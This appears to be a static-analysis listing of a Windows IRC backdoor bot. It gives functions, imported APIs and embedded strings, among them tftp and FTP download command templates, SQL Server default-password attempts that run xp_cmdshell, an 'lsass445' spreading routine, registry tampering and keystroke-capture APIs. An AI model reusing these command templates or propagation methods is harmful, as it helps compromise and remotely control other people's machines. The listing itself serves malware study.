sub_outside(): KERNEL32.GetTickCount WS2_32.socket KERNEL32.Sleep WS2_32.send WS2_32.closesocket WS2_32.WSACleanup KERNEL32.GetFileAttributesA KERNEL32.CreateFileA KERNEL32.CreateThread NTDLL.RtlGetLastWin32Error KERNEL32.FindFirstFileA KERNEL32.FindNextFileA KERNEL32.SetFilePointer KERNEL32.ReadFile KERNEL32.CloseHandle KERNEL32.CreatePipe KERNEL32.GetCurrentProcess KERNEL32.ExitProcess KERNEL32.CopyFileA KERNEL32.GetLocaleInfoA KERNEL32.GetVersionExA KERNEL32.GetVersion KERNEL32.LCMapStringW KERNEL32.MultiByteToWideChar KERNEL32.WideCharToMultiByte KERNEL32.UnhandledExceptionFilter KERNEL32.GetStringTypeW |
sub_419D97(0126): KERNEL32.SetUnhandledExceptionFilter |
sub_409663(019e): "%sKB" "failed" |
sub_415D92(03c8): "KERNEL32" "IsProcessorFeaturePresent" |
sub_40876D(04c3): KERNEL32.GetTickCount "%dd %dh %dm" |
sub_410C83(04fb): KERNEL32.CreateThread KERNEL32.Sleep KERNEL32.CloseHandle |
sub_403BAC(09ff): WS2_32.WSAStartup WS2_32.socket WS2_32.setsockopt WS2_32.ioctlsocket WS2_32.ntohs WS2_32.bind WS2_32.listen WS2_32.select WS2_32.__WSAFDIsSet WS2_32.accept WS2_32.send WS2_32.recv WS2_32.closesocket "220 fuckFtpd 0wns j0\n" "%s %s" "USER" "331 Password required\n" "PASS" "230 User logged in.\n" "SYST" "215 fuckFtpd\n" "REST" "350 Restarting.\n" "257 \"/\" is current directory.\n" "TYPE" "A" "200 Type set to A.\n" "TYPE" "I" "200 Type set to I.\n" "PASV" "425 Passive not supported on this serve"... "LIST" "226 Transfer complete\n" "PORT" "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"... "%x%x\n" "%s.%s.%s.%s" "200 PORT command successful.\n" "RETR" "150 Opening BINARY mode data connection"... "226 Transfer complete.\n" "425 Can't open data connection.\n" "QUIT" "221 Goodbye happy r00ting.\n" |
sub_40F7A8(0b6c): NTDLL.RtlGetLastWin32Error "The following Windows services are regi"... " Unknown" " Paused" " Pausing" " Continuing" " Running" " Stoping" " Starting" " Stopped" "%s: %s (%s)" |
sub_410481(0cbe): KERNEL32.CloseHandle |
sub_41AA01(0e35): KERNEL32.LoadLibraryA "user32.dll" "MessageBoxA" "GetActiveWindow" "GetLastActivePopup" |
sub_402136(10b8): KERNEL32.Sleep "tftp -i %s get %s\r\n" "echo open %s %d > o&echo user 1 1 >> o "... |
sub_418C85(1a6f): KERNEL32.GetEnvironmentStringsW KERNEL32.GetEnvironmentStringsA KERNEL32.WideCharToMultiByte KERNEL32.FreeEnvironmentStringsW |
sub_405DF5(22a3): "%d.%d.%d.%d" |
sub_407D58(2379): KERNEL32.CreateFileA "@echo off\r\nEcho REGEDIT4>%temp%\\1.reg\r\n"... "c:\\ab3.bat" |
sub_408B40(23e7): "[NETINFO]: [Type]: %s (%s). [IP Address"... |
sub_41BB58(26e4): KERNEL32.CompareStringW KERNEL32.CompareStringA KERNEL32.MultiByteToWideChar |
sub_41077B(2a7d): KERNEL32.CloseHandle |
sub_408FB8(3339): "rb" |
sub_406142(36ac): NTDLL.RtlDeleteCriticalSection KERNEL32.InitializeCriticalSectionAndSpinCount KERNEL32.CreateThread KERNEL32.Sleep NTDLL.RtlGetLastWin32Error |
sub_4038FB(37af): KERNEL32.Sleep "root" "sa" "admin" "password" "sql" "vb" "DRIVER={SQL Server};SERVER=%s,%d;UID=%s"... "EXEC master..xp_cmdshell 'del eq&echo o"... "EXEC master..xp_cmdshell '%s'" |
sub_40FADA(3fe3): "Share name: Resource: "... "Yes" "No" "%-14S %-24S %-6u %-4s" |
sub_415EB9(502f): "e+000" |
sub_4063A1(506d): KERNEL32.CreateThread KERNEL32.Sleep NTDLL.RtlGetLastWin32Error |
sub_414926(55e5): KERNEL32.HeapCreate KERNEL32.HeapDestroy |
sub_4149CB(597c): KERNEL32.VirtualFree NTDLL.RtlFreeHeap |
sub_4120D3(5c3f): NTDLL.RtlFreeHeap |
sub_4079C3(5c5a): NTDLL.RtlGetLastWin32Error "%s Error: %s <%d>." |
start(5d80): KERNEL32.GetTickCount |
sub_40323F(5f99): "GET / HTTP/1.0\r\nHost: %s\r\nAuthorization"... |
sub_417DF2(6091): KERNEL32.SetFilePointer NTDLL.RtlGetLastWin32Error |
sub_41AA8A(60b5): NTDLL.RtlAllocateHeap |
sub_41B1D1(6338): "1#SNAN" "1#IND" "1#INF" "1#QNAN" |
sub_40F62A(6353): "The specified service name is invalid." "The requested control code is undefined"... "The handle is invalid." "The handle does not have the required a"... "The service binary file could not be fo"... "The service cannot be stopped because o"... "The database is locked." "A thread could not be created for the s"... "The process for the service was started"... "The requested control code is not valid"... "An instance of the service is already r"... "The system is shutting down." "An unknown error occurred: <%ld>" |
sub_4150B0(64eb): KERNEL32.VirtualAlloc |
sub_4194A0(66df): KERNEL32.WideCharToMultiByte |
sub_416AE8(6954): NTDLL.RtlSizeHeap |
sub_402E61(6e81): WS2_32.select WS2_32.__WSAFDIsSet |
sub_410AAA(71f8): KERNEL32.GetTickCount "mIRC" |
sub_407A88(74ac): "mIRC" |
sub_4191D0(7f2c): NTDLL.RtlGetLastWin32Error |
sub_41C31C(822d): "invalid string position" |
sub_41C0F0(822d): "string too long" |
sub_412D64(8383): KERNEL32.GetLocalTime |
sub_417750(84ec): KERNEL32.CloseHandle NTDLL.RtlGetLastWin32Error |
sub_41169D(8732): "%s: %s stopped. (%d thread(s) stopped.)"... "%s: No %s thread found." |
sub_40FD41(893c): "Account: %S" "Full Name: %S" "User Comment: %S" "Comment: %S" "Unknown" "Administrator" "User" "Guest" "Privilege Level: %s" "Auth Flags: %d" "Home Directory: %S" "Parameters: %S" "Password Age: %d" "Bad Password Count: %d" "Number of Logins: %d" "Last Logon: %d" "Last Logoff: %d" "Logon Server: %S" "Country Code: %d" "User's Language: %d" "Max. Storage: %d" |
sub_412600(8af0): NTDLL.RtlUnwind |
sub_4110F8(8c2a): "Software\\Microsoft\\OLE" "EnableDCOM" "SYSTEM\\CurrentControlSet\\Control\\Lsa" "restrictanonymous" "%c$" "%c:\\" |
sub_40F9A4(8cdb): KERNEL32.WideCharToMultiByte |
sub_407A4D(8e50): KERNEL32.GlobalLock KERNEL32.GlobalUnlock |
sub_4138EF(91cb): KERNEL32.GetFileAttributesA NTDLL.RtlGetLastWin32Error |
sub_413D39(95ea): KERNEL32.MultiByteToWideChar NTDLL.RtlGetLastWin32Error |
sub_4041AF(9713): WS2_32.WSAStartup WS2_32.socket WS2_32.inet_addr WS2_32.ntohs WS2_32.connect WS2_32.closesocket WS2_32.WSACleanup |
sub_419E0B(9a80): KERNEL32.MultiByteToWideChar |
sub_41028F(9b66): "Invalid parameter." "Server name not found." "This network request is not supported." "Not enough memory." "The name is invalid." "Duplicate share name." "Invalid for redirected resource." "Device or directory does not exist." "Level parameter is invalid." "A general failure occurred in the netwo"... "The operation is allowed only on the pr"... "The user account already exists." "The group already exists." "The password is shorter than required ("... "An unknown error occurred." "The computer name is invalid." "Share not found." "The user name could not be found." "Network connection not found." |
sub_41A706(9c95): KERNEL32.CreateFileA KERNEL32.CloseHandle NTDLL.RtlGetLastWin32Error |
sub_407BAE(9dbe): "SeShutdownPrivilege" |
sub_413B43(a10d): NTDLL.RtlGetLastWin32Error |
sub_402FFF(a2f7): WS2_32.send |
sub_40F466(a598): KERNEL32.Sleep "NOTICE" "PRIVMSG" "%s" |
sub_4058D8(a6b1): " %s: %d," " Total: %d in %s." |
sub_4087D6(a7c4): KERNEL32.Sleep |
sub_41010F(a909): "Username accounts for local system:" " %S" "Total users found: %d." |
sub_40F588(a9bc): NTDLL.RtlGetLastWin32Error |
sub_4107E2(ac14): KERNEL32.GetTickCount "%s" |
sub_40743A(ac3c): "Kernel32.dll failed. <%d>" "User32.dll failed. <%d>" "Advapi32.dll failed. <%d>" "Gdi32.dll failed. <%d>" "Ws2_32.dll failed. <%d>" "Wininet.dll failed. <%d>" "Icmp.dll failed. <%d>" "Netapi32.dll failed. <%d>" "Dnsapi.dll failed. <%d>" "Iphlpapi.dll failed. <%d>" "Mpr32.dll failed. <%d>" "Shell32.dll failed. <%d>" "Odbc32.dll failed. <%d>" "Avicap32.dll failed. <%d>" |
sub_4053E1(acc4): KERNEL32.Sleep "octet" "rb" |
sub_41C549(aeff): KERNEL32.RaiseException |
sub_413F53(af5c): KERNEL32.ExitProcess |
sub_40FA76(afa1): KERNEL32.MultiByteToWideChar |
sub_4095D2(b2db): "RAM" "Cdrom" "Network" "Disk" "Invalid" "Unknown" |
sub_409EB0(bc9b): KERNEL32.Sleep |
sub_40A018(c24e): KERNEL32.Sleep "PASS %s\r\n" |
sub_417A14(c6bf): KERNEL32.ReadFile NTDLL.RtlGetLastWin32Error |
sub_4067AD(c870): KERNEL32.GetModuleHandleA NTDLL.RtlGetLastWin32Error KERNEL32.LoadLibraryA "kernel32.dll" "SetErrorMode" "CreateToolhelp32Snapshot" "Process32First" "GetDiskFreeSpaceExA" "GetLogicalDriveStringsA" "SearchPathA" "QueryPerformanceCounter" "QueryPerformanceFrequency" "RegisterServiceProcess" "user32.dll" "SendMessageA" "FindWindowA" "IsWindow" "GetClipboardData" "CloseClipboard" "GetAsyncKeyState" "GetKeyState" "GetWindowTextA" "GetForegroundWindow" "advapi32.dll" "RegCreateKeyExA" "RegSetValueExA" "RegQueryValueExA" "RegDeleteValueA" "RegCloseKey" "OpenProcessToken" "LookupPrivilegeValueA" "AdjustTokenPrivileges" "OpenSCManagerA" "OpenServiceA" "ControlService" "CloseServiceHandle" "EnumServicesStatusA" "IsValidSecurityDescriptor" "GetUserNameA" "gdi32.dll" "CreateDCA" "CreateDIBSection" "CreateCompatibleDC" "GetDIBColorTable" "SelectObject" "BitBlt" "DeleteDC" "DeleteObject" "ws2_32.dll" "WSAStartup" "WSASocketA" "WSAAsyncSelect" "__WSAFDIsSet" "WSAIoctl" "WSAGetLastError" "WSACleanup" "socket" "ioctlsocket" "connect" "inet_ntoa" "inet_addr" "htons" "htonl" "ntohs" "ntohl" "send" "sendto" "recv" "recvfrom" "bind" "select" "listen" "accept" "setsockopt" "getsockname" "gethostname" "getpeername" "closesocket" "wininet.dll" "InternetGetConnectedState" "InternetGetConnectedStateEx" "HttpOpenRequestA" "HttpSendRequestA" "InternetConnectA" "InternetOpenUrlA" "InternetCrackUrlA" "InternetReadFile" "InternetCloseHandle" "Mozilla/4.0 (compatible)" "icmp.dll" "IcmpCreateFile" "IcmpCloseHandle" "IcmpSendEcho" "netapi32.dll" "NetShareAdd" "NetShareDel" "NetShareEnum" "NetScheduleJobAdd" "NetApiBufferFree" "NetRemoteTOD" "NetUserAdd" "NetUserDel" "NetUserEnum" "NetUserGetInfo" "NetMessageBufferSend" "dnsapi.dll" "DnsFlushResolverCache" "DnsFlushResolverCacheEntry_A" "iphlpapi.dll" "DeleteIpNetEntry" "mpr.dll" "WNetAddConnection2A" "WNetAddConnection2W" "WNetCancelConnection2A" "WNetCancelConnection2W" "shell32.dll" "SHChangeNotify" "odbc32.dll" "SQLDriverConnect" "SQLAllocHandle" "avicap32.dll" "capCreateCaptureWindowA" "capGetDriverDescriptionA" |
sub_40902A(cb6d): KERNEL32.CreateFileA KERNEL32.GetTickCount KERNEL32.CloseHandle KERNEL32.ExitProcess "open" |
sub_41235C(cba9): NTDLL.RtlUnwind |
sub_414FFF(cbe8): NTDLL.RtlReAllocateHeap NTDLL.RtlAllocateHeap KERNEL32.VirtualAlloc NTDLL.RtlFreeHeap |
sub_413A39(cd54): KERNEL32.ExitProcess |
sub_41558C(d2f6): KERNEL32.RaiseException |
sub_4137CF(d50c): NTDLL.RtlAllocateHeap NTDLL.RtlReAllocateHeap |
sub_4042C6(d778): "GET " " " "\r\n" |
sub_419D86(d8fa): KERNEL32.SetUnhandledExceptionFilter |
sub_40888C(dbfe): KERNEL32.GetVersionExA "95" "NT" "98" "ME" "2K" "XP" "2003" "couldn't resolve host" "dd:MMM:yyyy" "HH:mm:ss" "[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB"... |
sub_409850(dc5b): "A:\\" |
sub_41907D(dc5c): "..." "Runtime Error!\n\nProgram: " "\n\n" "Microsoft Visual C++ Runtime Library" |
sub_410DD4(dcb6): "Software\\Microsoft\\OLE" "EnableDCOM" "SYSTEM\\CurrentControlSet\\Control\\Lsa" "restrictanonymous" |
sub_407B0A(de69): KERNEL32.CreateFileA WS2_32.send "explorer.exe" |
sub_407F2C(e076): "%d.%d.%d.%d" |
sub_4052C0(e1a1): "%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"... |
sub_414962(e71f): NTDLL.RtlAllocateHeap |
sub_405F2E(eb22): KERNEL32.GetTickCount NTDLL.RtlEnterCriticalSection NTDLL.RtlLeaveCriticalSection KERNEL32.Sleep "lsass445" |
sub_41B653(eb7e): NTDLL.RtlGetLastWin32Error |
sub_402297(ec29): KERNEL32.Sleep |
sub_408CFE(edda): KERNEL32.GetLocalTime "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s" |
sub_402AFB(f1cc): "CCCC" |
sub_419FA2(f22a): KERNEL32.WideCharToMultiByte "TZ" |
sub_40977E(f5ac): "failed" |
sub_41209D(fd6e): NTDLL.RtlAllocateHeap |
sub_41BA74(fe6c): KERNEL32.WideCharToMultiByte |